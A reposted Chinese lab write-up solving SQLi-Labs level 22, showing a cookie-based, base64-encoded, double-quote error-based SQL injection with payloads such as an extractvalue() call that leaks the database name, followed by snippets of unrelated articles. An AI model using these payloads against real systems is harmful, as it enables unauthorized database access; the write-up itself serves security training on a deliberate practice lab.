sqllab第二十二关通关笔记

news/2024/5/26 21:10:12/文章来源:https://blog.csdn.net/I_WORM/article/details/136726387

知识点:

  • cookie注入
  • 报错注入

直接抓取对应的数据包,发现还是一个cookie注入

参数值被base64加密了

测试这里使用什么手段读取输入

构造payload:uname=1'

base64加密:MSc=

出现了hacker的页面,说明信息错误但是单引号没起作用

使用双引号试一下

构造payload:1"

base64加密:MSI=

出现了语法错误的报错信息,说明这里使用了双引号进行读取输入

测试是否可以进行错误注入

构造payload:1" or exp(710)#

base64加密:MSIgb3IgZXhwKDcxMCkj

成功回显exp()的错误信息

接下来获取数据库名

构造payload:1" or extractvalue(1,concat(0x7e,database(),0x7e))#

base64加密:MSIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSkj

成功获取到了数据库名;收工

10

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_1007726.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

01_04_JavaWEB03_XML、Tomcat、http

XML_Tomcat10_HTTP 参考尚硅谷再总结复习 一 XML XML是EXtensible Markup Language的缩写,翻译过来就是可扩展标记语言。所以很明显,XML和HTML一样都是标记语言,也就是说它们的基本语法都是标签。 可扩展 三个字表面上的意思是XML允许自定义…

七、软考-系统架构设计师笔记-数据库设计基础知识

1、数据库基础概念 数据库基本概念 数据(Data)数据库(Database)数据库管理系统(DBMS)数据库系统(DBS) 1.数据(Data) 是数据库中存储的基本对象,是描述事物的符号记录。 数据的种类: 文本、图形、图像、音频、视频等。 2.数据库(Database, DB) 数据库…

Linux:kubernetes(k8s)Deployment的操作(13)

创建deployment 命令 kubectl create deploy nginx-deploy --imagenginx:1.7.9 再去使用以下命令分别查询 ubectl get deploy kubectl get replicaset kubectl get pod 他是一个层层嵌套的一个关系 首先是创建了一个 deploy 里面包含着replicaset replicaset里面含有…

python爬虫 Appium+mitmdump 京东商品

爬虫系列:http://t.csdnimg.cn/WfCSx 前言 我们知道通过Charles进行抓包可以发现其参数相当复杂,Form 表单有很多加密参数。如果我们只用 Charles 探测到这个接口链接和参数,还是无法直接构造请求的参数,构造的过程涉及一些加密…

Linux搭建我的世界(MC)整合包服务器,All the Mods 9(ATM9)整合包开服教程

Linux使用MCSM面板搭建我的世界(Minecraft)整合包服务器,MC开服教程,All the Mods 9(ATM9)整合包搭建服务器的教程。 本教程使用Docker来运行mc服,可以方便切换不同Java版本,方便安装多个mc服版本。 视频教程:https:…

Linux下的第一个C++小程序——进度条

一、进度条小程序 1.行缓存区 printf函数的输出,会先进入缓存区,而Linux下的缓存区刷新机制是按行刷新(根据不同系统机制不同),例如用printf函数去调试时,可以看到如果printf语句中不带换行,则…

lspci详解

lspci的作用 lspci是一个Linux命令,用于列出系统中的PCI总线设备信息。PCI(Peripheral Component Interconnect)是一种常见的计算机总线标准,用于连接各种外部设备(如网卡、显卡、声卡等)到计算机主板上。…

嵌入式3-14

1、整理思维导图 2、重写链表的代码 3、实现链表,按值查找返回位置的功能,按位置查找返回值,释放单链表,链表逆置 node_p create_link_list()//创建头结点 { node_p p(node_p)malloc(sizeof(node)); if(pNULL) { …

巨控GRM560远程模块即将上市

在自动化和工业控制领域,通信模块的作用至关重要。它们是实现设备间通信,以及与上位系统交换数据的桥梁。近年来,随着工业4.0的不断推进,对通信模块的要求也越来越高,不仅需要高效稳定的通信能力,还需要兼容…

【SpringBoot3】整合SpringMVC

文章目录 一、实现过程1.1 创建程序1.2 引入依赖1.3 启动类1.4 Controller 二、web相关配置三、静态资源处理3.1 默认路径3.2 覆盖路径 四、自定义拦截器(SpringMVC配置)4.1 拦截器声明4.2 拦截器配置4.2 拦截器测试 一、实现过程 springboot-part - GitHub 1.1 创建程序 模…

pip 配置镜像加速安装

在使用pip安装Python第三方库时,默认是使用pip官网的非常慢,可通过配置国内镜像源加速下载速度,以下是如何使用国内镜像源安装Python库的两种常见方式: 临时使用镜像源安装 如果你只是想临时使用某个镜像源安装单个或几个库&…

Hadoop大数据应用:Yarn 节点实现扩容与缩容

目录 一、实验 1.环境 2.Yarn 节点扩容 3.Yarn 节点缩容 二、问题 1.yarn启动服务报错 一、实验 1.环境 (1)主机 表1 主机 主机架构软件版本IP备注hadoop NameNode (已部署) SecondaryNameNode (已部署&…

Hadoop大数据应用:HDFS 集群节点缩容

目录 一、实验 1.环境 2.HDFS 集群节点缩容 二、问题 1.数据迁移有哪些状态 2.数据迁移失败 一、实验 1.环境 (1)主机 表1 主机 主机架构软件版本IP备注hadoop NameNode (已部署) SecondaryNameNode (已部署…

react 项目如何暴露 webpack配置文件

首先创建一个项目: // 全局安装 create-react-app 脚手架 npm install create-react-app -g// 创建项目 create-react-app demo 创建完成后,进到项目根目录,执行以下命令: npm run eject 出现以下命令: 选择yes即可…

unity3d Animal Controller的Animal组件中Speeds,States和modes基础部分理解

Speeds 速度集是修改你可以做的原始动画,增加或减少运动,旋转,或动画速度。它们与 州 所以,当动物在运动状态下,在飞行或游泳时,你可以有不同的速度 如果你的性格动画是 (已到位), 你一定要调整速度 位置 和 旋转 每一种的价值观 速度装置 …否则,它们不会移动或旋转。 每个速…

关于nginx做正向代理的那些事

声明:该文章只是用于技术探索的实践与讨论,没有其他用途。 准备: 一台能访问外网的服务器;一个域名,映射到上面的服务器;https的证书及密钥;nginx安装包; 协议使用: 开…

3.基础算法之搜索与图论

1.深度优先搜索 深度优先搜索(DFS,Depth First Search)是一种用于遍历或搜索树或图的算法。它将当前状态按照一定的规则顺序,先拓展一步得到一个新状态,再对这个新状态递归拓展下去。如果无法拓展,则退回…

springboot笔记

springboot笔记 快速入门添加父工程和web启动器创建启动类编写处理器controller springboot 配置文件批量读取配置文件多环境配置和激活SpringBoot--springmvc整合和配置SpringBoot3整合Druid连接池SpringBoot3整合Mybatisspringboot--aop和tx整合和配置springboot工程打包和快…

upload-labs 0.1 靶机详解

下载地址https://github.com/c0ny1/upload-labs/releases Pass-01 他让我们上传一张图片,我们先尝试上传一个php文件 发现他只允许上传图片格式的文件,我们来看看源码 我们可以看到它使用js来限制我们可以上传的内容 但是我们的浏览器是可以关闭js功能的…

详解数据挖掘

数据挖掘(Data Mining),又译为资料探勘、数据采矿,是数据库知识发现(Knowledge-Discovery in Databases,简称:KDD)中的一个步骤。数据挖掘主要是指从大量的数据中,通过算…